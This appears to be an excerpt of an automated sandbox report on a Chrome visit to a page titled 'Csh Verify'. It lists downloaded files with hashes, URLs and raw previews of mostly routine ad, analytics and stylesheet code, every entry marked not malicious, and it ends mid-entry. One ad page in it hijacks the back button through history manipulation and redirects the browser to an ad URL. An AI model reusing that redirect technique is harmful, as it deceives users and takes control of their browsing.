                                                                                                                                                                                                                                                                                                                                                                          Preview:var lotameIsCompatible = function() { return ( typeof Object.keys !== 'undefined' && typeof window.postMessage !== 'undefined' && typeof XMLHttpRequest !== 'undefined' && typeof(new XMLHttpRequest().withCredentials) !== 'undefined' && typeof console !== 'undefined' && typeof console.log !== 'undefined' && typeof document.createElement !== 'undefined' ); }; if(!lotameIsCompatible()){ if(console && console.error){ console.error('Lotame: This browser does not meet the minimum requirements.'); } } else { function sync16311_a(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}function sync16311_b(a){var b="undefined"!=typeof Symbol&&Symbol.iterator&&a[Symbol.iterator];return b?b.call(a):{next:sync16311_a(a)}}var sync16311_aa="function"==typeof Object.create?Object.create:function(a){function b(){}b.prototype=a;return new b},sync16311_c; if("function"==typeof Object.setPrototypeOf)sync16311_c=Object.setPrototypeOf;else{var sync16311_d;a:{var sync16311_ba={Ua:!0}
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:PNG image data, 791 x 463, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):101818
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.987034879218812
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3072:fXrF5AsOKCcnMlxrUjVElOzy01Fsree2GUWH+:fXhmeCcnIxo2lOeXehsH+
                                                                                                                                                                                                                                                                                                                                                                          MD5:A7C7682FC3936C9879BD4C94CA74E2F2
                                                                                                                                                                                                                                                                                                                                                                          SHA1:D7A306097B8C6BE2EC462E6B5F29E06498257F68
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:914CEA0C894C675E0E6147BD92BA1E5324258D07D9E60CDDBD7C382375C64EE2
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:6388271CD42E5C05F187BAB503D9C2E6740BFBD2DB406AB84E770BA73840B7ED05414E40EEF929B4C36B37E1E4D192988E594BCCD6A15F52271FAB9BDB3F4C3E
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://get.managedmethods.com/hubfs/Content%20Cloud%20App%20Security%20Checklist/HS%20Landing%20Page%20Preview%20-%20Cloud%20App%20Security%20Checklist%20(791%20x%20463%20px).png
                                                                                                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................e....pHYs..........+......PLTEGpL.....................................%>.........."9..........................................9;<......[^_.........ptu............x............&?..........$>...............................................................................(A...............................&=..".... 7.>p.............,E......<}.................................-......................................*CK]r..........................1c..............................EVo......z.....g..............*?P................9h...........Sgv...dx........./HX\o}......u|....n............."7H...<P^z..y...Ft......m...1F.......tvx~..bde......[...^......X.Px.mno5b.v...!6...'Y|...J..WYZi..Cn..0W!Ot...[..0.Y.*;....=1...9s.,...i.K...........:..B.I...S....9..N.}......^M..d.....}.e.<......-tRNS..y.}s.k.N+]<...#..4.EVd.......H.p...............iTXtXML:com.adobe.xmp.....<?xpacket begin='.' id='W5M0MpCehiHzreSzNTczkc9d'?>.<x:xmpmeta xmlns:x='adobe
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x100, components 3
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):2572
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.788809561087102
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:48:xD6SlM7QADK1ikWFA43t8rFBimuzFF/pkAXjkpykWVGeTp4c+kA:tDSUAuPEA4dkFYxRR4YJTCtkA
                                                                                                                                                                                                                                                                                                                                                                          MD5:6972D427B5D8AFFE06DF6B93EE0B739E
                                                                                                                                                                                                                                                                                                                                                                          SHA1:792864FA0F4143D8C023890296BA4CDA5D8ACCBD
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:14F945044393C401A954A0FFD8F1241830495651F9A33DFF95DDD3F5B0198FCE
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:570FC99C36CAB2D65A34B4B8F2609FF5AF0DCEADF9E13DF801B1EAABAB73F842CF5DF6BF8D90E27A4DCE5854C7C93A61BF32E1DD2DD772CF085842310BEEEA73
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://tpc.googlesyndication.com/simgad/11006336661316962835/14763004658117789537?w=100&h=100&tw=1&q=75
                                                                                                                                                                                                                                                                                                                                                                          Preview:......JFIF................................................#..#" !,#...7.,+1)4*.'/2,'<.*4&............!.".020/-0*2)'*0&.-**'2'''(.(-3(&-'*-&''&*'-&)'&&*'''......d.d...........................................6.........................!.1."AQ.#aq..2..$35Rbs..................................../.......................!1.AQ.."2q......a.#3..............?.....P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..\.z.M...t..`.*...e...{z~.&x.Tys.p..W..j:..e..i..C?...G.....tqz*.|.../?#.....y..L...TT.jV.?.....c......./....C...x....n:..g...e...N.).>.+..t..%..=.sG*n$[..,/b..f....v.Ld.g.a..........zO.:.H....."A......O.......)89...=.......P.u+.4.e..!"G..2v.,p=x..1ri....;}f....T:.`.=.=*e....N...s..P....2...|.kK^wd%v....J.`6..k/.?$..S...w.w}...5.+....OY.....?...].[`].....1])=*.<qz.Gs.t..y..*_..2o.A.)........G42.8;U.gc..,qj]....S.g.Wy-H.Z.Gv......8.......XR}._4i.7%%. hwgQ..u.......].A.....0$w.ZkN.c.K...s......Z7.qK......~......Xrc........:%..\_..rU. .]A..
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:PNG image data, 791 x 463, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):95715
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.984834261598729
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:eBT40tsPQ5iCg+twdsWqiedTIitkLXVOZWBNax9N1GdcaIH8t8hpEmo2OYevJWor:elW4IVpqiehptkLXNotH8eOnYeBl
                                                                                                                                                                                                                                                                                                                                                                          MD5:00749573E7F2BCF2A2EA1D744323BFF5
                                                                                                                                                                                                                                                                                                                                                                          SHA1:385EC7275653F2F2B954A7D48572A6DCDBA8846A
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:49A03254E5B4DD42653BBCC273E431A5013D782AE2C093210F7C81657953DCA7
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:7ECE4A04D44367123BA93ADE7284C6C2100708C573B8768B5965495DDD4D93F119D18ED7AAD27BDDB962250D974347BF71108E4238E5E783C98F597B7043F6DD
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................e....PLTEGpL.....................................%>.........."9..........................................9;<......[^_.........ptu............x............&?..........$>...............................................................................(A...............................&=..".... 7.>p.............,E......<}.................................-......................................*CK]r..........................1c..............................EVo......z.....g..............*?P................9h...........Sgv...dx........./HX\o}......u|....n............."7H...<P^z..y...Ft......m...1F.......tvx~..bde......[...^......X.Px.mno5b.v...!6...'Y|...J..WYZi..Cn..0W!Ot...[..0.Y.*;....=1...9s.,...i.K...........:..B.I...S....9..N.}......^M..d.....}.e.<......-tRNS..y.}s.k.N+]<...#..4.EVd.......H.p.............reIDATx....\U..3.1Jw0..?&D....c.".;x...o...m..{......4O..f./.t..1=KO.c.N..D2+..@.2....B...... . l.0......a.9..w_..toL...UVU
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (64644)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):70003
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.298605266244113
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:q49kULTaEJy7VonZXYNtWu2scVDXYRClzlIgQXyjXlkaioEFWOqDw6usT5aXsdtg:iND2LlzlIgQX28XsYce
                                                                                                                                                                                                                                                                                                                                                                          MD5:0958B43F935C68FF2A5837C68EBB2D57
                                                                                                                                                                                                                                                                                                                                                                          SHA1:5B48F6AFE82737172B6D407A6E3A410FE01142F2
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:32F7D263D9AC8CC57B2AFB5C2EFB2E9392D4C038DE65D26241398AEC2E78F93B
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:78B3ED374C649C179162FDF5FE9988FCDF97EBC9BF39738FD32C60F69CAD6F3C34E1FF6831922BC049D51250D815933803EA391838FEB32BA58AE6323B0F6040
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:/** . * HubSpot Analytics Tracking Code Build Number 1.993. * Copyright 2024 HubSpot, Inc. http://www.hubspot.com. */.var _hsq = _hsq || [];._hsq.push(['setPortalId', 6834707]);._hsq.push(['trackPageView']);._hsq.push(['setLegacy', false]);._hsq.push(['addHashedCookieDomain', '233546881']);._hsq.push(['addHashedCookieDomain', '82022089']);._hsq.push(['addHashedCookieDomain', '224894981']);._hsq.push(['addHashedCookieDomain', '20629287']);._hsq.push(['addHashedCookieDomain', '251652889']);._hsq.push(['enableAutomaticLinker', true]);._hsq.push(['setLimitTrackingToCookieDomains', true]);._hsq.push(['embedHubSpotScript', 'https://js-na1.hs-scripts.com/6834707.js', 'hs-script-loader']);._hsq.push(['initEventVisualizerScript']);._hsq.push(['setTrackingDomain', 'track.hubspot.com']);./** _anon_wrapper_ **/ (function() {./*! For license information please see hsa-prod.js.LICENSE.txt */.(hstc=hstc||{}).JS_VERSION=1.1;hstc.ANALYTICS_HOST="track.hubspot.com";(hstc=hstc||{}).Math={uuid:function()
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4955), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):4955
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.821797656656483
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:1gWUfvlcY021mvn1blhad7OIJoodnbUp2dEjkRUM8KF/L5:1DY0hf1bT47OIqWb118Klt
                                                                                                                                                                                                                                                                                                                                                                          MD5:2F165B36FDB2AFBDC7E47CAF60088E7A
                                                                                                                                                                                                                                                                                                                                                                          SHA1:83AB03AFF28D9A5197C66753021EE2F59382A0E0
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:F8C346DC28A03254F9B6EE7612963FA7200AAEB6BB432D7FDDA33BA071C949A6
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:DA8A416A320344135B8140CD1ECB119867F422F73EE4A4E74B261DDD1CE7E9A570643C6C19F9739B2B74947764AD07B82EBF7496067655F5AEAAE75AB1864BB8
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):35
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):2.9889227488523016
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:CUdrllHh/:HJ/
                                                                                                                                                                                                                                                                                                                                                                          MD5:28D6814F309EA289F847C69CF91194C6
                                                                                                                                                                                                                                                                                                                                                                          SHA1:0F4E929DD5BB2564F7AB9C76338E04E292A42ACE
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:8337212354871836E6763A41E615916C89BAC5B3F1F0ADF60BA43C7C806E1015
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:1D68B92E8D822FE82DC7563EDD7B37F3418A02A89F1A9F0454CCA664C2FC2565235E0D85540FF9BE0B20175BE3F5B7B4EAE1175067465D5CCA13486AAB4C582C
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://ic.tynt.com/b/p?id=wu!&lm=0&ts=1728897155274&dn=AFWU&iso=0&pu=https%3A%2F%2Fald.my.id%2F&r=https%3A%2F%2Fald.my.id%2F&t=Csh%20Verify&chpv=10.0.0&chuav=Google%20Chrome%3Bv%3D117.0.5938.134%2C%20Not%3BA%3DBrand%3Bv%3D8.0.0.0%2C%20Chromium%3Bv%3D117.0.5938.134&chp=Windows&chmob=0&chua=Google%20Chrome%3Bv%3D117%2C%20Not%3BA%3DBrand%3Bv%3D8%2C%20Chromium%3Bv%3D117
                                                                                                                                                                                                                                                                                                                                                                          Preview:GIF89a.............,...........D..;
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):3605
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.075622390478209
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:24:meRNNE1uyjLGLfh1ADA6V89sOPSejl6kHN4ynxmIvx9riqYniKL/bbzmc:duxLkSs629saW/+9WqQZL/qc
                                                                                                                                                                                                                                                                                                                                                                          MD5:F16E89FD08A708A6BD2E69BE50FD30AB
                                                                                                                                                                                                                                                                                                                                                                          SHA1:530FEF7EFD42A36908F40C87114A28C1398E1367
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:08B479C3EEB1CB4D44354E6BF17322CD7ACD38AE9A33EE5956898447ED43FAB6
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:94722AF96B830015C2515BD537E8610A25B61AC7C66C990D41565CD87AB50667E8CBFAB347188E98BA7793EF5AB48F0B3115C40DE55F4791D2CD1B2321405295
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:[{"id":16472,"location":"([a-zA-Z0-9_+%-]+)","element":"{{a[href*=\"twitter\"]}}","event":"click","behaviorType":"act","template":"Click On Twitter Link"},{"id":16473,"location":"([a-zA-Z0-9_+%-]+)","element":"{{a[href*=\"youtube\"]}}","event":"click","behaviorType":"act","template":"Click On YouTube Link"},{"id":16474,"location":"([a-zA-Z0-9_+%-]+)","element":"{{a[href*=\"hulu\"]}}","event":"click","behaviorType":"act","template":"Click On Hulu Link"},{"id":16475,"location":"([a-zA-Z0-9_+%-]+)","element":"{{a[href*=\"digg.com/submit\"]}}","event":"click","behaviorType":"act","template":"Share Content On Digg"},{"id":16476,"location":"([a-zA-Z0-9_+%-]+)","element":"{{a[href*=\"del.icio.us\"]}}","event":"click","behaviorType":"act","template":"Share Content On Delicious"},{"id":16477,"location":"([a-zA-Z0-9_+%-]+)","element":"{{a[href*=\"facebook\"]}}","event":"click","behaviorType":"act","template":"Click On Facebook Link"},{"id":16478,"location":"([a-zA-Z0-9_+%-]+)","element":"{{a[hre
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (5552)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):66849
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.321800177669433
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:RJeUwT7hpwNFHM9ZK0BK01QYTZ02LKVsdmpyKcicZ:RIT7ss9ZKAKBYj8wKcHZ
                                                                                                                                                                                                                                                                                                                                                                          MD5:F2E1FFA6276B8D2306CA9912344ADA2E
                                                                                                                                                                                                                                                                                                                                                                          SHA1:CA3F4C3FEBDBA84EBED851ED83E0B9A84F748441
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:CE12B015F2F5F7FCAA38A61E2C04217CAFE5D30F10B989A36A5206EF67C852E9
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:9DE1427A3E0A0F08DA7A63C35F82E9B7AA499CD236673389C44E8FDC4E57EDF16439B1BBFD97B64BC3B6A3011411E68334EC66EAB52E5926F66623B22F07E192
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):670
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.27194671069472
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:12:qTp808aM+0aQz4xk3qJmrK3DFNqQ98YHlANG1L7r7dHlsxTk/M61se1SpQb:0p808aCzvMzhgQ9/AQx7r7riw92e1S4
                                                                                                                                                                                                                                                                                                                                                                          MD5:00A0F26CB1C197C61C860E85025F10E1
                                                                                                                                                                                                                                                                                                                                                                          SHA1:E098135F10BF12EBB9DBFBBEE892DA56CB186B33
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:B87A08DB49FE9EA477F3A1DE0BB9BB5A1BDEDA22DD647E0B8196CC72B4BF2B7A
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:131EA0E4C8A3030716EEED43371C3F43AA60C43B36B4B789FEE54A5DB98101E508EECADF5A2B6BE40AB294A780F96C3B18322075EE8C80B292E33560EF475209
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://hy.markkasmick.click/imp/70341?param_3=nortb_over_ttl&nrb
                                                                                                                                                                                                                                                                                                                                                                          Preview:<!doctype html>.<html>.<head>. <meta charset="utf-8" />. <style>* { border: 0; margin: 0; outline: 0; padding: 0}</style>. <title></title>.</head>.<body>.<script type="text/javascript">. try {. window.opener.postMessage('{"b":587040,"c":86400,"oi":68,"oc":86400}', '*');. window.opener = null;. } catch (e) {}. try {. var rev = REVERSE_URL;. history.pushState(null, document.title, rev);. history.pushState(null, document.title, rev);. } catch (e) {}. location.href = 'http://p.jwalf.com/ad/ad?p=198473&w=638192&d=7930e1d26d7336e03d98-1635872656638192&s=212257';.</script>. 2410111058_4d26-->.</body>.</html>
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (2868)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):430169
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.5821163985782345
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:wosugg2aXn2yn2S7PPpSCSGcUJtCXUxO/3sOKw1CqpH36X5kNzhqPytvFaOrw1y7:wosugg2aXn2yn2S7PPpStGcUJtCXUxOV
                                                                                                                                                                                                                                                                                                                                                                          MD5:C99FEF5B5348B29C6617B074969BF7B9
                                                                                                                                                                                                                                                                                                                                                                          SHA1:92EA16144E76256B6E98A62EFD1FACE152482272
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:21EE1BCEE6D8C9FCFFBFE8C70CDEF5510A0464D8AC06CED64D2180B246838A9E
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:2C2ED93F507DDD0816A42ACC881E14141C5DD4AC570C84D034814BA61EADE736709217ACC332DB9013D56971C170F68A5A05ECD7D1988748A620087F5B20DDAA
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://pagead2.googlesyndication.com/pagead/managed/js/adsense/m202410080101/show_ads_impl_fy2021.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function(sttc){'use strict';var aa,ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};function ca(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");} .var da=ca(this),ea=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",fa={},ia={};function ja(a,b,c){if(!c||a!=null){c=ia[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}} .function ka(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in fa?f=fa:f=da;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))break a;f=f[g]}d=d[d.length-1];c=ea&&c==="es6"?f[d]:null;b=b(c);b!=null&&(a?ba(fa,d,{configurable:!0,writable:!0,value:b}):b!==c&&(ia[d]===void 0&&(a=Math.random()*1E9>>>0,ia[d]=ea?da.Symbol(d):"$jscp$"+a+
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):51
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.726059410471684
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:QBRgyNq/HG9AikQKKP9GfwY:IgymGfkQKy9GfwY
                                                                                                                                                                                                                                                                                                                                                                          MD5:495338A6EFD6AF599E072D037124A01D
                                                                                                                                                                                                                                                                                                                                                                          SHA1:0CE5CD05BA2D3D6FDA67AE675167918A72C9B061
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:5E82852016FA27FECC81C08D93F8DF436F32304F55DF9EEF33749DF41BFD74A0
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:33B01333AA173AF721B27254192FF611CE7B86B57713A1EC6966744FBEBB4D589022C292126C7C9251323E29D349A1A317241E7459C591C6B0BE5EEBEF365D80
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://t.dtscout.com/pv/?_a=v&_h=ald.my.id&_ss=1dqyail9op&_pv=1&_ls=0&_u1=1&_u3=1&_cc=us&_pl=d&_cbid=6lao&_cb=_dtspv.c
                                                                                                                                                                                                                                                                                                                                                                          Preview:try{_dtspv.c({"b":"chrome@117"},'6lao');}catch(e){}
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):23427
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.112735417225198
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:1HHLO7eS0F4bBY/fn6jZcy9/cGK1q8CarY64Cb+dOy:1HHCLYXfl1q8CarY64Cb+dl
                                                                                                                                                                                                                                                                                                                                                                          MD5:BA0537E9574725096AF97C27D7E54F76
                                                                                                                                                                                                                                                                                                                                                                          SHA1:BD46B47D74D344F435B5805114559D45979762D5
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:4A7611BC677873A0F87FE21727BC3A2A43F57A5DED3B10CE33A0F371A2E6030F
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:FC43F1A6B95E1CE005A8EFCDB0D38DF8CC12189BEAC18099FD97C278D254D5DA4C24556BD06515D9D6CA495DDB630A052AEFC0BB73D6ED15DEBC0FB1E8E208E7
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://www.w3schools.com/w3css/4/w3.css
                                                                                                                                                                                                                                                                                                                                                                          Preview:./* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes */.html{box-sizing:border-box}*,*:before,*:after{box-sizing:inherit}./* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */.html{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}.article,aside,details,figcaption,figure,footer,header,main,menu,nav,section{display:block}summary{display:list-item}.audio,canvas,progress,video{display:inline-block}progress{vertical-align:baseline}.audio:not([controls]){display:none;height:0}[hidden],template{display:none}.a{background-color:transparent}a:active,a:hover{outline-width:0}.abbr[title]{border-bottom:none;text-decoration:underline;text-decoration:underline dotted}.b,strong{font-weight:bolder}dfn{font-style:italic}mark{background:#ff0;color:#000}.small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}.sub{bottom:-0.25em}sup{top:-0.5em}figure{margin:1em 40px}img{border-style:none}.code,kbd,p
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (3703)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):8342
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.4184852796901595
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:192:pu8a+e+qX2y1Ezhh2GvbbEl+xWpN3zFFFFFJUFFFFFJyFFFFFJc7pFFFFFJMFFFi:pVa+e+Kn1Ezj2GvbbpxWpRokFU9
                                                                                                                                                                                                                                                                                                                                                                          MD5:4A64112C69B3C4B3F104F38D9547A094
